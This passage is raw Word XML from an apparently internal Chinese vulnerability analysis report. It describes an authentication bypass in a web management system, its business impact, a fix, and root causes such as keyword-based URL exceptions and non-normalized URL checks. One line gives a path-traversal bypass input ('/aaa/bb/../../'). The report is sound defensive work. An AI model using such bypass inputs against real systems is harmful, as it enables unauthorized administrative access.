                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>login.cgi请求</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00E86AA4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并为用户创建会话，返回会话ID</w:t>
            </w:r>
            <w:r w:rsidRPr="00370EE1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D63C4F" w:rsidRPr="00D63C4F" w:rsidRDefault="00D63C4F" w:rsidP="00D63C4F">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D63C4F" w:rsidRDefault="00D63C4F" w:rsidP="0039320A">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>非法用户</w:t>
            </w:r>
            <w:r w:rsidR="006D5184">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以绕过认证，成功以任意身份（包括管理员身份）接入系统，进而</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>完全控制Web管理系统。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00546FA0" w:rsidTr="0096355D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="852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6FA0" w:rsidRPr="00546FA0" w:rsidRDefault="00546FA0" w:rsidP="00546FA0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00546FA0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>对业务的影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00546FA0" w:rsidRPr="003F2A30" w:rsidTr="00546FA0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6851" w:rsidRDefault="00546FA0" w:rsidP="00546FA0">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00546FA0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>利用该漏洞，可以越权查看设备信息以及对设备进行配置，造成设备业务中断，配置泄露。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE6851" w:rsidRPr="00BE6851" w:rsidRDefault="00BE6851" w:rsidP="00546FA0">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4483F" w:rsidRPr="003F2A30" w:rsidTr="00D4483F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="852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483F" w:rsidRPr="00546FA0" w:rsidRDefault="00D4483F" w:rsidP="00546FA0">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>产品解决方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4483F" w:rsidRPr="003F2A30" w:rsidTr="00BE6851">
        <w:trPr>
          <w:trHeight w:val="3697"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="852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E6851" w:rsidRPr="00BE6851" w:rsidRDefault="00BE6851" w:rsidP="00546FA0">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6851">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>左边是原代码，右边是修改后的代码</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D4483F" w:rsidRDefault="00D4483F" w:rsidP="00546FA0">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:noProof/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5270500" cy="2044700"/>
                  <wp:effectExtent l="1905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5270500" cy="2044700"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00021104" w:rsidRDefault="00B9133B" w:rsidP="00B9133B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根因分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B92C26" w:rsidRDefault="00737E10" w:rsidP="00D84D26">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未充分使用</w:t>
      </w:r>
      <w:r w:rsidR="00F56BFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成熟的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架及</w:t>
      </w:r>
      <w:r w:rsidR="00F56BFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证、鉴权机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D26" w:rsidRDefault="00D84D26" w:rsidP="00B92C26">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品自己开发</w:t>
      </w:r>
      <w:r w:rsidR="00293CC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证、鉴权机制，且对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中包含特定关键字的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求做了例外处理（如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Login.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等），</w:t>
      </w:r>
      <w:r w:rsidR="00F56BFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r w:rsidR="00A7531F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理逻辑</w:t>
      </w:r>
      <w:r w:rsidR="00F56BFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>又</w:t>
      </w:r>
      <w:r w:rsidR="00A7531F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不严谨，导致</w:t>
      </w:r>
      <w:r w:rsidR="00B92C26" w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现</w:t>
      </w:r>
      <w:r w:rsidR="00A7531F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00A7531F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未标准化、</w:t>
      </w:r>
      <w:r w:rsidR="00B92C26" w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遗漏</w:t>
      </w:r>
      <w:r w:rsidR="00B92C26" w:rsidRPr="00D84D26">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00A7531F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidR="00B92C26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00F501DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r w:rsidR="00B92C26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>低效等问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00F56BFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品决定使用成熟</w:t>
      </w:r>
      <w:r w:rsidR="00F56BFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00F56BFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架的时候，必须</w:t>
      </w:r>
      <w:r w:rsidR="008668E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>充分</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架本身的</w:t>
      </w:r>
      <w:r w:rsidR="004E03D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鉴权机制，</w:t>
      </w:r>
      <w:r w:rsidR="00A7531F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实行集中的认证、鉴权</w:t>
      </w:r>
      <w:r w:rsidR="001A3360">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00F56BFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不要对</w:t>
      </w:r>
      <w:r w:rsidR="001A3360">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架的完整认证、鉴权机制做不恰当的裁剪</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B92C26" w:rsidRDefault="00B92C26" w:rsidP="00B92C26">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>依赖未</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准化</w:t>
      </w:r>
      <w:r w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的URL路径做</w:t>
      </w:r>
      <w:r w:rsidR="001C63EB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidR="00DF7231">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鉴权判断</w:t>
      </w:r>
      <w:r w:rsidR="001C63EB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7231" w:rsidRPr="00DF7231" w:rsidRDefault="00F501DE" w:rsidP="00B90645">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品目前很多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鉴权代码是自己实现的</w:t>
      </w:r>
      <w:r w:rsidR="007A2500">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，容易出现使用未标准化的</w:t>
      </w:r>
      <w:r w:rsidR="007A2500">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="007A2500">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做为认证、鉴权的判断依据</w:t>
      </w:r>
      <w:r w:rsidR="00C56697" w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="007A2500" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="007A2500" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="007A2500" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A2500" w:rsidRPr="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>request.getRequestURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A2500" w:rsidRPr="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="007A2500" w:rsidRPr="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A2500" w:rsidRPr="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>request.getRequestUR</w:t>
      </w:r>
      <w:r w:rsidR="007A2500" w:rsidRPr="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A2500" w:rsidRPr="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="007A2500" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00357B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未标准化得</w:t>
      </w:r>
      <w:r w:rsidR="007A2500" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A2500" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A2500" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007A2500">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后做关键字匹配</w:t>
      </w:r>
      <w:r w:rsidR="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007A2500">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为认证、鉴权的</w:t>
      </w:r>
      <w:r w:rsidR="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断</w:t>
      </w:r>
      <w:r w:rsidR="007A2500">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依据</w:t>
      </w:r>
      <w:r w:rsidR="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就</w:t>
      </w:r>
      <w:r w:rsidR="00357B69" w:rsidRPr="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很容易绕过认证、鉴权判断</w:t>
      </w:r>
      <w:r w:rsidR="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如恶意输入</w:t>
      </w:r>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>/bb/../../</w:t>
      </w:r>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而以</w:t>
      </w:r>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>“/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>/bb/”</w:t>
      </w:r>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被认为是可信</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这种场景就存在绕过</w:t>
      </w:r>
      <w:r w:rsidR="00357B69" w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证鉴权判断</w:t>
      </w:r>
      <w:r w:rsidR="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="007A2500" w:rsidRPr="00357B69">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7231" w:rsidRDefault="00DF7231" w:rsidP="00DF7231">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖</w:t>
      </w:r>
      <w:r w:rsidR="004A5688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不严谨的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>局部或模糊匹配做</w:t>
      </w:r>
      <w:r w:rsidR="001C63EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidR="00910745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鉴权判断</w:t>
      </w:r>
      <w:r w:rsidR="001C63EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依据</w:t>
      </w:r>
